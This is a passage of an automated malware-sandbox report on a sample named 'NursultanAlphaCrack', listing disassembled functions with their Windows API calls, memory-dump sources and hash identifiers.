Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 65a2c6ba9ab1cda7b04e10a2fe5e4996addb5a629b50164c2b28e9e4ae335a55
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 65a2c6ba9ab1cda7b04e10a2fe5e4996addb5a629b50164c2b28e9e4ae335a55
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: f4f044dae96216564d6e27aa802bde24b7614da896906d065e53e060cd7a6b89
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: f4f044dae96216564d6e27aa802bde24b7614da896906d065e53e060cd7a6b89
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: a9f7117fac2d201c35a76406d73cedc349d5d7840ab2e16ebec304f5477f908c
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: a9f7117fac2d201c35a76406d73cedc349d5d7840ab2e16ebec304f5477f908c
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 33dcc3be5174a5b27345a8726218b11bdad2b74a012b66dbf1616e3b3c3cd2a9
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 33dcc3be5174a5b27345a8726218b11bdad2b74a012b66dbf1616e3b3c3cd2a9
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 88ff16749d8887a5d5583f963dea6d24bd6aa9a69addfb99284c6a5d27d0605a
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 88ff16749d8887a5d5583f963dea6d24bd6aa9a69addfb99284c6a5d27d0605a
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 2128f4da607879ed5fc0ef2dc7e8ec0365c4c297d859145a14d5839fe27e141c
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 2128f4da607879ed5fc0ef2dc7e8ec0365c4c297d859145a14d5839fe27e141c
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 08fffabcfad5f734562d86b93f5106e25cb9d3b6870636c5f4feec5b3dc734f4
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 08fffabcfad5f734562d86b93f5106e25cb9d3b6870636c5f4feec5b3dc734f4
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 0b715152a44a30c2aece252b3c6b492866a87ac0c9539688e4bf558d0ade37cd
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 0b715152a44a30c2aece252b3c6b492866a87ac0c9539688e4bf558d0ade37cd
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 1e2a012d7e567851308e885c8dbdc9f384528f66551886a30e5b1fa90aa248f5
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 1e2a012d7e567851308e885c8dbdc9f384528f66551886a30e5b1fa90aa248f5
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001DE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Strings

I=u, xrefs: 001DE1DD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 432d5e753789ef14d819e746107a4f164ff36605f1ec51b09a8bf479e393fc1b
Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
Opcode Fuzzy Hash: 432d5e753789ef14d819e746107a4f164ff36605f1ec51b09a8bf479e393fc1b
Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1

Function 001EBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 001EB7BB: GetOEMCP.KERNEL32(00000000,?,?,001EBA44,?), ref: 001EB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001EBA89,?,00000000), ref: 001EBC64
GetCPInfo.KERNEL32(00000000,001EBA89,?,?,?,001EBA89,?,00000000), ref: 001EBC77

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 785b6bd11419ef20eef1b8e4d4f42225feba33b90c48d5cf28b9339a6a14e741
Instruction ID: fc70ec80bdb4fcd214303a74115d416f5a03bb0ae964433e945b9450efa93461
Opcode Fuzzy Hash: 785b6bd11419ef20eef1b8e4d4f42225feba33b90c48d5cf28b9339a6a14e741
Instruction Fuzzy Hash: B451647090CA859EDB24CFB2C8C16BFBBE5FF51308F28406ED0968B261D7359946CB90

Function 001C9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,001C9A50,?,?,00000000,?,?,001C8CBC,?), ref: 001C9BAB
GetLastError.KERNEL32(?,00000000,001C8411,-00009570,00000000,000007F3), ref: 001C9BB6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 760634f6dac82d30cc281159c7d77f27f24d6b89d0b07bb706c9347eec352903
Instruction ID: 6426c4d14b34f7e81985568fda437263233a7976897b3dae07bdbe94af079ba1
Opcode Fuzzy Hash: 760634f6dac82d30cc281159c7d77f27f24d6b89d0b07bb706c9347eec352903
Instruction Fuzzy Hash: AE41CE71604381AFDB28DF15E588F6AB7E5FFF4320F158A2DE89183260D770ED448A91

Function 001EBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 001E97E5: GetLastError.KERNEL32(?,00201030,001E4674,00201030,?,?,001E3F73,00000050,?,00201030,00000200), ref: 001E97E9
Part of subcall function 001E97E5: _free.LIBCMT ref: 001E981C
Part of subcall function 001E97E5: SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E985D
Part of subcall function 001E97E5: _abort.LIBCMT ref: 001E9863

Part of subcall function 001EBB4E: _abort.LIBCMT ref: 001EBB80
Part of subcall function 001EBB4E: _free.LIBCMT ref: 001EBBB4

Part of subcall function 001EB7BB: GetOEMCP.KERNEL32(00000000,?,?,001EBA44,?), ref: 001EB7E6

_free.LIBCMT ref: 001EBA9F
_free.LIBCMT ref: 001EBAD5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 75c1309dd67c9b1165a98b0db238abf6e1911676fd8ece9614db9e532e13bf9b
Instruction ID: 8305d8b05e1fd6569763f54f830695592f19d3da5b6e2db9b7a6413e709dfd32
Opcode Fuzzy Hash: 75c1309dd67c9b1165a98b0db238abf6e1911676fd8ece9614db9e532e13bf9b
Instruction Fuzzy Hash: 9F314231908589AFDF10DF96E4C1BAE77F1EF90324F2540A9F5049B2A2EB315D40DB50

Function 001C1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C1E55

Part of subcall function 001C3BBA: __EH_prolog.LIBCMT ref: 001C3BBF

_wcslen.LIBCMT ref: 001C1EFD

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 94bc45fd33298cde52d03b9cf39dd8791797a73b08174fde1a9a1633c785d6a4
Instruction ID: f1c87f5577f9528ae8ca204b156485749a52544df8cc2cda50e79ff7d5d237e3
Opcode Fuzzy Hash: 94bc45fd33298cde52d03b9cf39dd8791797a73b08174fde1a9a1633c785d6a4
Instruction Fuzzy Hash: 54312D71944209AFCF15EF99C945EEEBBF5AF69300F10005EF845A7252C7369E15CB60

Function 001C9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001C73BC,?,?,?,00000000), ref: 001C9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 001C9E70

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: cae4c05f560735d5ff1f5f17ab6ea3820313386bfd41495e7204de615a5fa0ff
Instruction ID: 728800343bb50abf35227b59aa08dd73e554a9be7969baf542aa3372aed55ae7
Opcode Fuzzy Hash: cae4c05f560735d5ff1f5f17ab6ea3820313386bfd41495e7204de615a5fa0ff
Instruction Fuzzy Hash: EB21CE31248285ABC714DF64C899FBABBE4AF65304F08491DF8C687541D329E90CDB62

Function 001C966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001C9F27,?,?,001C771A), ref: 001C96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001C9F27,?,?,001C771A), ref: 001C9716

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 77a7dc1cb0ca005367be67c184a1e3ec51c44486517e3226e85fe7fbdb3793d5
Instruction ID: 4afea8462d873f0fefb4d98eff8b37372a7474fb035befe699ec374725b1cd35
Opcode Fuzzy Hash: 77a7dc1cb0ca005367be67c184a1e3ec51c44486517e3226e85fe7fbdb3793d5
Instruction Fuzzy Hash: 6921BDB15043546EE3308A65CC89FF7B7DCEB69324F000A1DFA95C66D1C774E8848A71

Function 001C9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 001C9EC7
GetLastError.KERNEL32 ref: 001C9ED4

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
